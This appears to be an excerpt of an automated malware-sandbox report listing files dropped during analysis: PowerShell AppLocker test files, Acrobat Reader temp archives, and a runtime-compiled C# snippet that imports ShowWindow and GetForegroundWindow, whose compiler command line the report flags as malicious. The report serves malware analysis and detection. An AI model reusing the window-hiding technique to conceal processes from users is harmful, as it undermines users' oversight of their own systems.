                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cnluhyp4.wjc.psm1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_emiwbwck.1jy.ps1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_grgbbzbj.i1x.ps1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qgu42y5z.kfb.ps1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qnz4xfbz.ijm.psm1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vwpxlmfh.3hw.ps1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wlunbt1m.hwr.psm1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\acrocef_low\037849c1-4f15-43ba-9ff7-0f18c1ff7391.tmp

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 939944
                                                                                                        Category:dropped
                                                                                                        Size (bytes):362282
                                                                                                        Entropy (8bit):7.972590665273909
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:kdG+V4lamSZXs1TOLpVzrKHdUNkjXYyvPoO6Mi7HzU+Nv+3zjZb67WAZFWUni:kRqIZXWOL3rKw4HL+NGvg7LW4i
                                                                                                        MD5:BABCD4D2F710F800534DF8C7513FF17B
                                                                                                        SHA1:D558575EA176DDC203476BB9EE7A65BA773C6293
                                                                                                        SHA-256:7C330301AF2824A4AAF8E2EB3FF69798F0524FF960B00F35132FF00260E6D512
                                                                                                        SHA-512:C952D057C520673627CDC07DFCE995BB3B30541D83FB283F2291F5B0D9014B068871DF41E0DB999204606249B1A92E1BC9D9509B3E71068731AA8CC8A29880DA
                                                                                                        Malicious:false
                                                                                                        Preview:...........{[[G.8.......Hk./.$...kc'......x.2`[...P.f..oWU....s...d3<y..s.......?.5..v.w.....n..C7..]...+|w.F.....'K....O.......]..B.]........=p....=..]......7..........s....f1....'.o..[L\............h'~....u...}..p...s....m..q.j.'.'X....V.fV...}.g..{....=.......c..|..Y.{....>.M....x.g....s..g.........v...}.d..........p.#l}.g..v...Vq.C....{.....f~L.3|.g....}.'.?.3...vC.....M?..}..n.og.k~.^.}.O...5..$..;./.Uo...-..Wo.Wo.|..~w..O..+.7...To..N.....:...W...Z.U_...w......3.U_........G......'.}.....m|?.....?....W......w.z..|.........Zx...-..o'.....C?..0.2.b..#........{.o...........>..... 8...pk..~..).3.I;...C;....V.nv...;\_....Noa..V-..-..6.<...../......>_.g=.NB...0..0.9.?......N.p{..m.g......... ..._cO}...N..w|.c..;.,.....+........_m.._.#.5..'..1.zT....uu.fP.O.z.=.f..j...7.(.@!..._`........n...S.o.n[.F.u.{....-B]...c...x.(.)..s......[NB.].......]<.].7.w._=3...N...aeZ............../...=.....vf......!.,..... X....H...O|b...O..

                                                                                                        C:\Users\user\AppData\Local\Temp\acrocef_low\074a2f72-5076-4514-9528-75dd3363a215.tmp

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57837
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1418364
                                                                                                        Entropy (8bit):7.976384385897213
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24576:tGZK9IeQYIGCa29WH+yzG2FZrj1bLgiZMHLRS9y8hBjnn9T5TcgyCCw/hn90hhcB:tGZK9IeQZGWWHZzG2N0i+LRS9yan9Ggn
                                                                                                        MD5:9DC63352ECE5DA6BCB6CA92BAA3520A5
                                                                                                        SHA1:BA5995F3EA85AC8171027F095A3DF67951F2A656
                                                                                                        SHA-256:2D7C28E3B9FE6C06B20EBC021F35893CCE9B1AC4CC303FF5EB734A8AE4A5C44F
                                                                                                        SHA-512:BEBF8645CEC51787E98AF897E261757040E1D11BD61471BE72C09A5423F8ACA3EAE79521BDCD60A65258EFBCB5CF2AA33116723967644327A70B19B19ADF43BB
                                                                                                        Malicious:false
                                                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                                        C:\Users\user\AppData\Local\Temp\acrocef_low\78b142e5-54c3-40c0-bd57-90e58ba02106.tmp

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 633642
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1405907
                                                                                                        Entropy (8bit):7.975945065391471
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24576:5GZK9Ieaj1bLgiZMHLRS9y8hBjnn9T5TcgyCCw/hn90hhcnDaYIGCa29WHqbzG2E:5GZK9Ies0i+LRS9yan9GgEw/hqhhyDaC
                                                                                                        MD5:A6A3F1325767D2255CD7C9E8547F8341
                                                                                                        SHA1:78FD4EDE91D5DD91D60333761F0E51C120ED1204
                                                                                                        SHA-256:C314C670D4838349BD0C31EBB17E9D74B58E9E858212E1D4D44D9611665A3163
                                                                                                        SHA-512:AC8B9B51FFFDC5EC8BA5526352B2DBAA189247C2B9A6FFE56031A272BC996692A2957CD053848763C5C1A2372CF72919F2FBE86F7D5AEED602E0F85511E03B2E
                                                                                                        Malicious:false
                                                                                                        Preview:............o.I..V.j..Ev..0.. .(zv.\..."%Q..HJ..=..4...i..d..nNwS...._...A..q...C...Y$.... F.$v. .|....#@.$@`l..yU.z...F... .......S..O.u?..cf..........k.m.O..Us.Kn....k...csjz.m....g.f....s..1-.y....-sd...~;f.......Ush...#.r......-..K..<.s....-.m.m_{......;......gP....=A.-|.5.f..o.o...}.w.u..<z...?......F....3..[....=....6...O-<`.yDm.].....l.....>....[...w..]...N.D=..j.g....t..O...9A.zO!..c.....M.q..... .. ...}."X........8w.M...c.=...1. ..'i..._G..#.}..q..m.G..So=\c.O.v...#^....AfJ.9..P..!B=..gM.3.xb.....3..<...y..w.]..K...Q_.9).....F............=...{...9....[.T.e.eqd."m..0zL...P.....^...._.......FV........qd.....H..u.^;%..|.....gF.7o..7...}.>.F.y.WR.......+o........m.+..N6:.yc'{c'{c'{c'{c'..x.#3......0.1.-...>mq.c.}.......{U.e........6......B..>....k..o....}B...L.n..'...."}.C.h!...x......Zz..1..Mmh8..M..].!...ms..P..%.j.Ba..o...........L.&.....z.C.>f..F......}...}:.8........;.#...........:..j.l .h%u..~.c..8oG?.#..

                                                                                                        C:\Users\user\AppData\Local\Temp\acrocef_low\7d03c71e-5136-4d75-a292-d4a2fc52c6ed.tmp

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 12789
                                                                                                        Category:dropped
                                                                                                        Size (bytes):962913
                                                                                                        Entropy (8bit):7.989737613179096
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24576:sSqOuLWyIu1IZX5v4uFVALJcU9yBpQVDq:8L3b1y5v4XcU2pd
                                                                                                        MD5:16EBC67DD7D9F72BDA8351E2A52C8EB2
                                                                                                        SHA1:CA44B653C76292DD2771BF18E0564E1AFFF89C48
                                                                                                        SHA-256:66D37437020AD1F3465D7B6AF7C5C34812B9391943098B8DD7B8D139F672BCB1
                                                                                                        SHA-512:7451F31FE6B71EC58930B6D78FF71E7589B1DC4803DFD787312E4162BE5776E96A35EF5184DD6550CD7BBA30322247E44DF530FBDD9A510872BE23648F2E5929
                                                                                                        Malicious:false
                                                                                                        Preview:...........}[o\IzX1.d......8I.W.=-.o...Z...3...J...|..$[lv.."........S.......M.I`......... .8....w...%....@.K}......$G.v....s...W...z]...V.uCuT...TS.TC.U....[[m.}...|.....B..<.R.......?.]5..{jV=..............s.-@....Q3.F..z....|.>"hgO}..a.]h..o..l.O.{...P..../..C._...}..0.O...z......._P..O.(1..=..@..B%.1f...q:...Pf. ....mu.Z.z......"....,.\\..Kj.`8...l8.....Vh."*.M...l.j,C.2..3N.....u(s.>oC.E.e..a.~...."...n..G..2........a..G./...V.>_..9h..a.jl...J/Q_........\rz..7+Pf.J/A.y..c..L~.u.........w.J..L.......BM..z.@oE.......T"L......(..................=_....5hgK..g..z...4.....~...q{E.3..m.V.a.x.......Pk........3...c...^.@.C.......<......6.+......m...6.Q...9M.s..e.........$.m.M_.VV.d.~....g.x....x.M..l<....<A...6.8.....j.p.zDnF.K.v&1...C.@.P..=.......O....M.(..5..C.JD.6M...........>...*.4.........&I.-...*...P.d.....`\D1.nB...w....8.0z..;..O........g............@.e...w...NeZ^..a~@...E....*.....2..i.`...w.N..GT.)..v.<.....vD?.<..c......uq......G..)

                                                                                                        C:\Users\user\AppData\Local\Temp\wr03xjs0\CSC787E510638EC4229B85DAEC3AD1CFCC9.TMP

                                                                                                        Download File
                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                        File Type:MSVC .res
                                                                                                        Category:dropped
                                                                                                        Size (bytes):652
                                                                                                        Entropy (8bit):3.098377789412905
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryiqak7YnqqvbPN5Dlq5J:+RI+ycuZhNlakSzPNnqX
                                                                                                        MD5:4C769746FAC007D6B7093E2D42B49EEE
                                                                                                        SHA1:9339E1DD0ED19CB709D3BC2EDEA6479E2070CB24
                                                                                                        SHA-256:2CB9B965B327E1730F7583EBE5217D83957E2945EF6E8C23385FE0263F983501
                                                                                                        SHA-512:F72689426159D99A95DD4F8335406B30A15C287B2DAF5C401CB9595177BDE81651EC422B5D828B670EF05991843DDA63F327197B090DD5A9E1A85BB2CD92D0BF
                                                                                                        Malicious:false
                                                                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.r.0.3.x.j.s.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...w.r.0.3.x.j.s.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                        C:\Users\user\AppData\Local\Temp\wr03xjs0\wr03xjs0.0.cs

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):244
                                                                                                        Entropy (8bit):4.952945910145069
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:V/DssSuVY/so68SRvoSoODnso68SRaqK4Li:V/D9PY/REvoOnREfe
                                                                                                        MD5:6E7BC02C23E28738F9898185137720DB
                                                                                                        SHA1:F0450E92B0D01C2A0D23DEF93299FFD1512FAB46
                                                                                                        SHA-256:80A682DC3D4FEF7A23471B441BBA682648D7373DEB9889E0017E3BBBA43754E7
                                                                                                        SHA-512:FF24CEDAD3619B0D2379F668A06CE36A5DAFF2EBC2B11FCF8BD960C3272D99F5F77EDCA893701A6232DC9EB07794C8D2ABC3FD802CE7E5638EE87291DE1AAEFB
                                                                                                        Malicious:false
                                                                                                        Preview:.using System; using System.Runtime.InteropServices; public class Win32 { [DllImport("user32.dll")] public static extern int ShowWindow(IntPtr hWnd, int nCmdShow); [DllImport("user32.dll")] public static extern IntPtr GetForegroundWindow(); }

                                                                                                        C:\Users\user\AppData\Local\Temp\wr03xjs0\wr03xjs0.cmdline

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):371
                                                                                                        Entropy (8bit):5.258359984148568
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2KJjq23fhZVaPM0zxs7+AEszIKJjq23fhZVa6:p37Lvkmb6K9FAk0WZEYFA6
                                                                                                        MD5:BE036170311897D0CC6F591840721B1C
                                                                                                        SHA1:16EBD1B0A1FC409B8F9C22DC139245A01FFDF2FF
                                                                                                        SHA-256:5CF6E5828776585AFE94D6ED7BB0B2082D99588628762F6C485039C75D51C2EF
                                                                                                        SHA-512:759292B87196DDB8B0242B1F271994A2664E939CB7F419BC01C1015D4C5DEE55BA94BA02EE96F70FCDD79044DD81634E56D4775378D8FC6A5CACC23914282135
                                                                                                        Malicious:true
                                                                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wr03xjs0\wr03xjs0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wr03xjs0\wr03xjs0.0.cs"

                                                                                                        C:\Users\user\AppData\Local\Temp\wr03xjs0\wr03xjs0.dll

                                                                                                        Download File
                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3072
                                                                                                        Entropy (8bit):2.7902466849913568
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:etGS3J2JJi8R86QMBTxetkZf/ZuIx3+WI+ycuZhNlakSzPNnqI:6ANR9ZxRJ/Fx3l1ulla35qI
                                                                                                        MD5:BBB0B2018B4630F4891FD83CB6309119
                                                                                                        SHA1:225B541E26C65B9F2029207E7E4DAB056B875775
                                                                                                        SHA-256:BCF66C8D45D0153C294856E5575B3DB0F22C8C78D8D00ED99D57FE259064584A
                                                                                                        SHA-512:ADC2C0166EE4C42FBC49C87D4FE7F79A9E2D5D3E05AED9A297CC10D0A48117153AEA4F8C4E45698AA55197888B8C93A03BF52E52DC6531FB346A3B3ABFFDCF7A
                                                                                                        Malicious:false
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....-g...........!.................#... ...@....... ....................................@.................................P#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................-.&.....g.....g.......................................... 4............ ?.....P ......S.........Y.....^...S.....S...!.S.....S.......".....+.......4.......?..................................................<Module

                                                                                                        C:\Users\user\AppData\Local\Temp\wr03xjs0\wr03xjs0.out

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
                                                                                                        Category:modified
                                                                                                        Size (bytes):872
                                                                                                        Entropy (8bit):5.335205757343596
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:KhId3ka6KnA8E+AzKax5DqBVKVrdFAMBJTH:ykka6CLE+2K2DcVKdBJj
                                                                                                        MD5:B53D3D9841FFF79802963BB6B930F731
                                                                                                        SHA1:326BF83AF7661F3903D012043E7849FB5E3CF59F
                                                                                                        SHA-256:23F43C9EACAAAAAE93A00FF828E20B473C9986FF3FBAC67D6B707C54DC3A81DB
                                                                                                        SHA-512:BA4F77FFB697AD046ED95958D2DD942E7536347DE6F057B5E192464631B6BBCA84B82685F3E57149C4875443D60B89BF0317D4BE8479F3BDE39576D3E96833CE
                                                                                                        Malicious:false
                                                                                                        Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wr03xjs0\wr03xjs0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wr03xjs0\wr03xjs0.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2O1NO0F856X3OTSSDE18.temp

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):6222
                                                                                                        Entropy (8bit):3.733382687359192
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:ZAfug5SBCfdAS6rjkvhkvCCtSzDGxiHU2zDGxiHu:ZqJYnyD8VOD89
                                                                                                        MD5:FAB7AA65C4AACC4B255A4BC47B022F3E
                                                                                                        SHA1:1E4C0C7E0CA16851AC5CCCF0CC5FAE0A75D37260
                                                                                                        SHA-256:3F7D19A1722770EA6353308C5E1D307A01EBF604914A629605DCCD4B34A591F4
                                                                                                        SHA-512:AF17736BF71A0A9F430174A548C13EAB20259112704EAD45475BF81A4219A6EE0689B66927E64FC2325978A1A91499579695F43A7D6D708F21A0E79DC8187C23
                                                                                                        Malicious:false
                                                                                                        Preview:...................................FL..................F.".. ......A.....a.t.1..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........A......g.1...Aw.1......t...CFSF..1.....&W.<..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......&W.<hYMQ.............................A.p.p.D.a.t.a...B.V.1.....hYHQ..Roaming.@......&W.<hYHQ..........................t/#.R.o.a.m.i.n.g.....\.1.....+YS6..MICROS~1..D......&W.<hYDQ...........................RN.M.i.c.r.o.s.o.f.t.....V.1.....hYC...Windows.@......&W.<hYDQ...........................C..W.i.n.d.o.w.s.......1.....&W.<..STARTM~1..n......&W.<hYDQ....................D.......b.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....&W.<..Programs..j......&W.<hYDQ....................@......+}.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......&W.<hYNQ..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......&W.<hYNQ....8...........

                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):6222
                                                                                                        Entropy (8bit):3.733802121460088
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:AASug5SBCfdAh6rjkvhkvCCtSzDGxiHU2zDGxiHu:ANJTnyD8VOD89
                                                                                                        MD5:0BBFACF39F136530A024FE25B1FFE650
                                                                                                        SHA1:04B91F8CF32A713063536D4F3FFA2FC907135F89
                                                                                                        SHA-256:9D7100BDE23DC87D67698123333C837845272328BF71B2A3C20B5BE541C20D61
                                                                                                        SHA-512:ADAFE2813AA20D7C222C2EEC9CF4A963DE3B66FB31131FAECC48F671DCA2B56CA181155A2BA0F54C1EF674141A0679DD5781CEF4F2EAA01A2B43161653CAE453
                                                                                                        Malicious:false
